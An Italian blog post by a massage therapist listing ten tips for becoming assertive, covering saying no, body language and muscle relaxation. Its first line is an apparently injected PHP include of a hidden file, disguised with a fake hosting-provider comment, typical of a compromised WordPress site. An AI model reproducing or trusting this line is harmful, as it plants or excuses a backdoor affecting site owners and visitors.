@include_once('/var/lib/sec/wp-settings.php'); // Added by SiteGround WordPress management system Come diventare assertivo: i 10 migliori suggerimenti.

Come difenderti dalle persone aggressive: I 10 migliori suggerimenti dei grandi.

Come diventare assertivo: Sei appena entrato in ufficio e subito ti arriva una telefonata dal tuo capo che ti urla in un orecchio, che vuole il lavoro subito.

Come diventare assertivo

Come diventare assertivo

Te l’ha consegnato il giorno prima alle 19 e tu sei uscito per andare a casa o a fare dello sport. Poi hai lavorato tutta la notte gratis, ma non l’hai terminato perché ti mancavano i dati che avevi nel computer dell’ufficio.

Che fai ? Quante volte mi son trovato in queste situazioni, sia quando lavoravo da dipendente e anche ora che faccio il libero professionista e l’imprenditore.

Alle volte ti arrivano delle richieste assurde, che sai benissimo che non riuscirai a portare a termine. Oppure ti chiamano delle persone che sono incavolate per i fatti loro e ti sbattono la loro rabbia addosso.

In queste situazioni ho sempre fatto grande fatica, perché se reagisci ne viene fuori una lite inutile e controproducente. Se invece stai zitto incassi la rabbia ma la tua autostima va a farsi benedire.

Per non dire anche la tua salute. Alcuni si ammalano anche di depressione e stress. Altri clienti che ho seguito, addirittura hanno paura a presentarsi o parlare con determinate persone che sono molto aggressive.Allora mi son messo alla ricerca sul web, ma anche da colleghi ben più noti di me. Ho fatto una sintesi dei migliori modi per diventare assertivi.

Ecco i 10 migliori suggerimenti che ho trovato utili per me ma anche per i miei clienti per me. Spero ti possano essere utili.

Intanto definiamo bene che cos’è l’assertività:

Essere assertivo cade esattamente a metà tra la passività e l’aggressività. Se sei passivo, non arriverai mai a esprimere le tue esigenze; se sei aggressivo, sembrerai un bullo e probabilmente indirizzerai male le tue frustrazioni.

Se invece sei assertivo, sarai in grado di esprimere i tuoi desideri rispettando le esigenze altrui, e avrai più possibilità di ottenere quello che vuoi e meriti.

Qui ti lascio anche una definizione presa da wikipedia ed ho inserito un link ad un testo, se vuoi approfondire, di un nota formatrice. Piccolo manuale per non farsi mettere i piedi in testa.

Come diventare assertivo: Primo suggerimento

Come diventare assertivo

Come diventare assertivo

Questo tipo di comunicazione prevede il rispetto dei sentimenti, delle necessità, dei desideri e delle opinioni degli altri. Un comunicatore assertivo evita di infrangere i diritti degli altri, mentre afferma i propri, cercando un compromesso nel processo. La comunicazione assertiva utilizza azioni e parole per esprimere necessità e desideri in modo calmo, proiettando un messaggio di sicurezza.

Come diventare assertivo: Secondo suggerimento

Impara a riconoscere i pensieri associati con la comunicazione assertiva. Una persona assertiva sarà portata per natura a seguire certi schemi di pensiero, che indicano sicurezza e rispetto per gli altri. Questi pensieri includono:

  • “Non mi farò sfruttare e non attaccherò le altre persone”.
  • “Farò valere i miei diritti in maniera rispettosa”.
  • “Mi esprimerò in modo diretto e aperto”.
Hidden Content

Come diventare assertivo: Terzo suggerimento

Inizia a scrivere un diario. Per poter imparare a comunicare in modo assertivo, è importante imparare a gestire in modo efficace le tue emozioni. Per alcune persone, semplicemente capire come si sviluppano i propri processi emotivi può essere abbastanza per imparare a cambiare il modo di comunicare con gli altri e a esprimere le proprie emozioni in modo più assertivo. Tenere un diario può essere l’opzione migliore per imparare a conoscere il tuo comportamento, registrando le situazioni e facendo domande specifiche relative all’assertività.

 

Come diventare assertivo: Quarto suggerimento

Valuta l’intensità di ogni pensiero ed emozione. Usa di nuovo la scala da 0 a 100. Segna uno “0” se non credevi al pensiero, o “100” se lo ritenevi vero al 100%. Poi chiediti: “Sto pensando in modo passivo, aggressivo o assertivo?”. Scrivi la risposta a questa domanda. Scrivi le prove a favore – o contro – ogni pensiero. Valuta se possono esserci altri modi di interpretare la situazione.

Clownterapia

Clowterapia

Come diventare assertivo: Quinto suggerimento

Impara a conoscere i benefici della comunicazione assertiva. L’assertività è uno stile di comunicazione che permette di esprimere in modo sicuro le proprie necessità e i sentimenti, e allo stesso tempo di rimanere cosciente delle opinioni, dei desideri, delle necessità e dei sentimenti degli altri. Si tratta di un’alternativa al comportamento passivo o aggressivo. Imparare a comunicare in modo assertivo dà molti benefici:

  • Comunicazione efficace e potente.
  • Sicurezza.
  • Aumento dell’autostima.
  • Rispetto per gli altri.
  • Migliori capacità decisionali.
  • Riduzione dello stress dovuto alle aspettative degli altri.
  • Capacità di risolvere i conflitti.
  • Aumento del rispetto per la propria persona.
  • Sensazione di essere compreso e di avere il controllo delle proprie decisioni, che sostituisce quella di essere ignorato o costretto.
  • Ridotta tendenza alla depressione
  • Probabilità ridotta di abuso di sostanze.
Hidden Content

Come diventare assertivo: Sesto suggerimento

Come diventare assertivo

Dici “no” quando è il caso di farlo. Dire di no può essere difficile per molte persone. Dire di sì, però, quando dovresti dire di no può portare a stress immotivato, risentimento e rabbia verso le altre persone. Quando dici di no, può esserti utile tenere a mente questi consigli:

  • Fallo brevemente.
  • Sii chiaro.
  • Sii onesto.
  • Se ad esempio non hai tempo di fare un favore a una persona, puoi dire semplicemente: “Non posso questa volta. Mi dispiace deluderti, ma ho troppe cose da fare quel giorno, e non ho tempo”.

 

Come diventare assertivo: Settimo suggerimento

Usa un linguaggio del corpo appropriato. Ricorda sempre che, per essere assertivo, la comunicazione non verbale è importante. È possibile pensare di comportarsi in modo assertivo quando in effetti il tuo atteggiameè passivo o aggressivo, se non farai attenzione allo stile di comunicazione non verbale.

  • Tieni un tono di voce calmo e un volume neutro.
  • Mantieni il contatto visivo.
  • Rilassa il viso e la postura del corpo.

Come essere assertivo

Come diventare assertivo: Ottavo suggerimento

Riconosci lo stress nella tua vita. Può essere difficile tenere le emozioni sotto controllo, e queste possono influenzare il modo in cui comunichiamo. Quando ci sentiamo stressati o turbati, i nostri corpi entrano in modalità stress, generando reazioni chimiche e ormonali che ci preparano a una minaccia percepita. I tuoi pensieri in questo stato sono diversi da quelli che avresti se fossi in uno stato di calma, chiarezza e razionalità, e questo rende più difficile utilizzare le tecniche di assertività.

  • Riconosci i momenti della vita in cui sei stressato. Scrivi un elenco delle cose che contribuiscono al tuo stato di stress.

 

Come diventare assertivo: Nono suggerimento

Prova il rilassamento muscolare progressivo. Se la meditazione ti rende nervoso o se pensi di non aver tempo di praticarla in modo corretto, puoi comunque rilassarti con la tecnica del rilassamento muscolare progressivo. Questa tecnica attiva la reazione calmante del corpo e lo riporta in un equilibrio fisiologico, grazie alla tensione e al rilassamento di tutti i gruppi muscolari in progressione. Per eseguire questa tecnica in circa 15-20 minuti:

  • Trova una posizione comoda su una sedia, con i piedi piatti a terra, le mani sulle cosce e gli occhi chiusi.
  • Inizia l’esercizio stringendo i pugni, tenendo la posizione per 10 secondi. Poi apri le mani, rilassandole per 10 secondi. Ripeti.
  • Contrai l’avambraccio piegando la mano verso il basso e tieni la posizione per 10 secondi. Rilascia, e rilassati per altri 10 secondi. Ripeti.
  • Continua con il resto del corpo, fermandoti a contrarre e rilassare ogni gruppo muscolare. Inizia con la parte alta delle braccia, poi le spalle, il collo, la testa e il viso. Poi continua con petto, addome, schiena, glutei, cosce, polpacci e piedi.
  • Quando hai contratto tutto il corpo, siedi per alcuni minuti per goderti la sensazione di rilassamento.
  • Alzati lentamente per evitare le vertigini (la pressione sanguigna scende quando ti rilassi) o di rigenerare tensione.
  • Se non hai 15-20 minuti per completare l’intero esercizio, puoi rilassare solo i gruppi muscolari particolarmente tesi.

 

Come diventare assertivo: Decimo suggerimento

Sfoga la rabbia in modo sano, facendo sport oppure parlando con un amico o un coach esperto.Può essere utile coltivare le tue passioni e la felicità nelle cose che fai. Però impara ad esprimere, quello che pensi e senti, senza paura.

Ringrazio molto questi grandi formatori per i bei consigli che metterò in pratica volentieri. Spero ti siano stati utili.

Aspetto un tuo commento qui sotto.

Giovanni Garavello
 

Massaggiatore professionista. Osteopata.

Click Here to Leave a Comment Below 0 comments

"Rimanere rigidi sulle proprie posizioni fa male alla schiena..."

La prima seduta è GRATUITA.

Per Info e prenotazioni, chiama al 3384090012. Oppure manda un messaggio via WhatsApp.

x